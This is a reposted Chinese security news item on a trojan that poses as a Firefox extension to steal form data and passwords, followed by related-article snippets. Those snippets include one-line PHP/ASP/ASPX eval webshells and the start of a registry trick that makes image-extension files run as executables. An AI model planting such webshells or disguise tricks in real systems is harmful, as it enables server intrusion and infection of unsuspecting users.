警惕:新木马现身,伪装成Firefox扩展(转)

最新推荐文章于 2021-07-28 21:15:02 发布
转载 最新推荐文章于 2021-07-28 21:15:02 发布 · 171 阅读 · 0

安全机构McAfee警告,一种新木马正伪装成Firefox扩展进行安装,运行后会窃取用户在浏览器中输入的敏感信息,包括信用卡号、密码等,并能嗅探ICQ、FTP、IMAP和POP3密码。此木马需与“Downloader-AXM”配合使用,已被列为“低危”。McAfee已增加防护。
在周三,安全机构McAfee发出警告,它表示发现了一种伪装成Firefox扩展进行安装的新木马。这个木马一旦在感染系统上运行,它就会把在浏览器中输入的个人信息发送到某个恶意站点。

  这些信息可能是用户的信用卡号,密码,电子银行的PIN(个人身份号码 personal identification number)或其它敏感信息。McAfee还表示,这个木马还能嗅探到ICQ,FTP,IMAP和POP3等的密码。

  这个问题被列为“低危”,并且这木马还需要另外一个称为“Downloader-AXM”的恶意软件才能运行。McAfee表示,它已经增加了针对这个木马的保护功能。然而,McAfee表示这个木马仍然在施虐中。

  已经发现链接到木马的网站的IP地址是81.95.xx.xx。它通过针对IE的VBS/Psyme利用代码进行安装。恶意利用代码能够被激活VirusScan的IE检测到,而通过最新的DAT文件也可以检测到FormSpy木马。

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10294527/viewspace-124095/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10294527/viewspace-124095/

红队 | 社会工程学 | 邮件钓鱼 、木马伪装
哦 卷!
06-16 1488
社会工程学是一种特殊的攻击方式,与其他利用系统漏洞等网络攻击和入侵不同,社会工程学充分利用了人性中的“弱点”,包括本能反应、好奇心、信任、贪婪等,通过伪装、欺骗、恐吓、威逼等种种方式以达到目的。信息系统的管理者和使用者都是人,无论信息系统部署了多少安全产品,采取了多少有效的安全技术,如果系统的管理者或者使用者被利用,这些防护技术和措施都将成为摆设。人的因素才是系统的软肋,可以毫不夸张地说,人是信息系统安全防护体系中最不稳定也是最脆弱的环节。
谨防! 发现了另外两个Firefox恶意软件扩展,这次带有功能全面的特洛伊木马...
09-19 456
Last July, we pointed out that the Google Reader Notifier extension had turned into crapware, the NoScript add-on was hijacking another extension, and even the Fast Dial extension was spamming you—so ...
针对macOS的木马程序 伪装成Discord混乱使用者
weixin_34247155的博客
12-17 259
资安业者Malwarebytes近日揭露了一款针对macOS的木马程序OSX.LamePyre,它伪装成游戏玩家常用的通讯程序Discord,却会在背景不断地撷取屏幕画面,并将它们传送到远程的C&C服务器。 文章自:一起胜博发 虽然伪装成Discord,但它并未具备任何Discord功能,而是一个Automator脚本程序,执行时会在选单列上出现通用的Automator图标,并译码与...
Discord 公司如何使用 Cassandra 存储上亿条线上数据
weixin_33725515的博客
05-08 230
2019独角兽企业重金招聘Python工程师标准>>> ...
php木马伪装成图片,木马伪装图片运行的技巧
weixin_39916681的博客
03-23 1934
任意文件当做木马来运行你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。更改exe为gif:@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]&gt...
[远程控制]木马伪装:图片
不忘初心,护天下安全!
07-28 4870
前言 坦言道,自己在最近的渗透之路碰了很多次壁,钓鱼大神们让我羡慕不已。而钓鱼的弹药里面必不可少的就是木马了,最近都在流行快捷方式马(lnk马),这次就不多介绍,从最简单的图片马伪装给大家介绍。 伪装,改变不了被杀,只是改改面目而已。友情提醒,如果不会免杀,那就只是徒增笑资罢了。 伪装进行时 这次介绍的工具为BD2 Net Injector,百度下载即可,要注意后门哈。 首先,我们准备如下: 准备好的可执行文件(核心文件); 确定伪装的后缀; 用于伪装的图片; 图片未打开时的缩略ico文件
WebShellKillerTool:一步到位木马查杀
木马程序是一种特殊的恶意软件,它通常伪装成合法的软件以欺骗用户,一旦激活,它能够允许攻击者远程控制受害者的计算机,窃取敏感信息,或者进行其他恶意行为。 描述中提到的“内含工具,无需安装,解压即用”,...
精选资源
react-carousel:一个纯可扩展的React旋木马,由Brainhub(:red_heart:JS的工匠)提供动力
02-05
一个纯可扩展的React旋木马,由 ( :red_heart: JS) || 目录 :electric_plug: :front-facing_baby_chick: :hammer: :carousel_horse: :paw_prints: :smiling_cat_with_heart-eyes: :person_tipping_hand:...
第四节 木马的伪装和免查杀方法(天融信网络安全公开课)
09-23
第四节 木马的伪装和免查杀方法(天融信网络安全公开课)
ExeBinder:捆绑木马与小游戏的软件工具
木马(Trojan horse)是一种恶意软件,它通常伪装成合法的软件来诱骗用户安装。在安装了木马之后,攻击者可以远程控制用户的电脑,获取敏感信息,或者执行其他恶意操作。通过捆绑软件将木马与其他软件或游戏捆绑在...
一句话木马:初识木马练习
Zeker62的博客
07-28 4110
一句话木马: 不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的。 一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取。 php木马: <?php @eval($_POST['password']);?> asp是: <%eval request ("password")%> aspx是: <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%&gt
型Android木马伪装成Google Play,兼具多种恶意功能
mozhe_的博客
10-15 7853
在一个把一切都通过网络连接到一起的时代,移动设备开始越来越频繁地参与到我们每一个人的日常生活中。与之相应的,恶意行为者似乎也注意到攻击这些设备的机会越来越多。思科Talos团队在最近观察到了一种的移动设备入侵企图——一种的Android木马,我们称之为“GPlayed”。 根据Talos团队的说法,GPlayed是一个具有多种内置功能的木马程序,并且具有很高的可扩展性,使得它成为恶意行为者非...
Firefox修改UserAgent伪装成手机浏览器
热门推荐
给你一颗小瓜子的博客
09-01 1万+
修改方法 1、进入Firefox的配置页面,在浏览器地址栏输入“about:config”,你会看到如下的提示: 这样可能会失去质保! 修改这些高级设置可能会对本应用程序的稳定性、安全性以及性能造成不良影响。请仅在你十分清除的情况下操作。 这是Firefox正常的提示,这里保存了Firefox很多关键的数据,点击“我保证会小心”,成功进入Firefox配置界面。 2、在右
用DSP28335实现三电平SVPWM整流器的程序-svpwm-SVPWM整流-三电平SVPWM-逆变器-三电平
最新发布
12-09
用DSP28335实现三电平SVPWM整流器的程序-svpwm-SVPWM整流-三电平SVPWM-逆变器-三电平
洁净制药厂房的供配电设计
12-09
本 PPT 介绍了制药厂房中供配电系统的总体概念与设计要点,内容包括: 洁净厂房的特点及其对供配电系统的特殊要求; 供配电设计的一般原则与依据的国家/行业标准; 从上级电网到工厂变电所、终端配电的总体结构与模块化设计思路; 供配电范围:动力配电、照明、通讯、接地、防雷与消防等; 动力配电中电压等级、接地系统形式(如 TN-S)、负荷等级与可靠性、UPS 配置等; 照明的电源方式、光源选择、安装方式、应急与备用照明要求; 通讯系统、监控系统在生产管理与消防中的作用; 接地与等电位连接、防雷等级与防雷措施; 消防设施及其专用供电(消防泵、排烟风机、消防控制室、应急照明等); 常见高压柜、动力柜、照明箱等配电设备案例及部分设计图纸示意; 公司已完成的典型项目案例。 1. 工程背景与总体框架 所属领域:制药厂房工程的公用工程系统,其中本 PPT 聚焦于供配电系统。 放在整个公用工程中的位置:与给排水、纯化水/注射用水、气体与热力、暖通空调、自动化控制等系统并列。 2. Part 01 供配电概述 2.1 洁净厂房的特点 空间密闭,结构复杂、走向曲折; 单相设备、仪器种类多,工艺设备昂贵、精密; 装修材料与工艺材料种类多,对尘埃、静电等更敏感。 这些特点决定了:供配电系统要安全可靠、减少积尘、便于清洁和维护。 2.2 供配电总则 供配电设计应满足: 可靠、经济、适用; 保障人身与财产安全; 便于安装与维护; 采用技术先进的设备与方案。 2.3 设计依据与规范 引用了大量俄语标准(ГОСТ、СНиП、SanPiN 等)以及国家、行业和地方规范,作为设计的法规基础文件,包括: 电气设备、接线、接地、电气安全; 建筑物电气装置、照明标准; 卫生与安全相关规范等。 3. Part 02 供配电总览 从电源系统整体结构进行总览: 上级:地方电网; 工厂变电所(10kV 配电装置、变压
三菱FX5U PLC通信客户端(基于MC协议 (SLMP/3E帧) - 原生TCP/IP)
12-09
这是一个基于.NET Framework的Windows桌面应用程序,专门用于与三菱FX5U系列PLC进行TCP/IP通信。项目采用标准的MC协议(3E帧),实现了完整的读写功能,并提供了直观的用户界面,是工业自动化领域与PLC通信的实用工具。 1. 完整的MC协议实现 支持3E帧格式(ASCII通信协议) 实现批量读取和批量写入 自动处理小端字节序数据格式 完善的错误代码解析机制 2. 多功能数据操作 位设备操作:X(输入)、Y(输出)、M(辅助继电器) 字设备操作:D(数据寄存器)、W(字设备)、B(链接寄存器)、R(文件寄存器) 浮点数支持:D寄存器浮点读写(IEEE 754标准) 批量读写:支持连续地址批量操作 3. 智能地址处理 八进制地址换:X、Y寄存器自动进行八进制和十进制换 地址对齐:位设备按16位对齐读取,确保数据正确性 范围验证:自动验证地址范围和数据类型 4. 实时监控系统
基于卷积神经网络与常规波束形成的时间窗方法水下目标方位估计算法源码及项目资料
12-09
本资源提供了一套完整的水下目标方位估计解决方案,包含两种核心算法实现:基于常规波束形成的时间窗方法与基于卷积神经网络的时间窗方法。该方案附有详尽的技术文档、完整的项目资料以及经过验证的源代码。 项目已通过学术指导与严格评审,在答辩环节获得了优异的评价。所有代码均经过充分测试,确保功能稳定可靠后方才发布。 本资源适用于人工智能、信号处理、自动化、电子信息及相关领域的在校师生、研究人员及工程技术人员,可用于课程实践、毕业设计、科研项目立项或技术原型开发。具备一定基础的开发者可基于现有代码进行功能扩展与定制化修改,以满足特定的研究或应用需求。 欢迎获取并使用本资源,以期在相关技术领域进行深入探讨与共同提升。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
RAR Faker:将压缩文件伪装成图片的技术解析
- **恶意软件传播**:攻击者可能将病毒、木马等恶意程序打包成RAR文件,并伪装成图片诱导用户下载解压,从而感染用户的设备。 - **数据泄露**:企业或个人敏感信息可能被伪装成图片文件,通过电子邮件或即时通讯工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值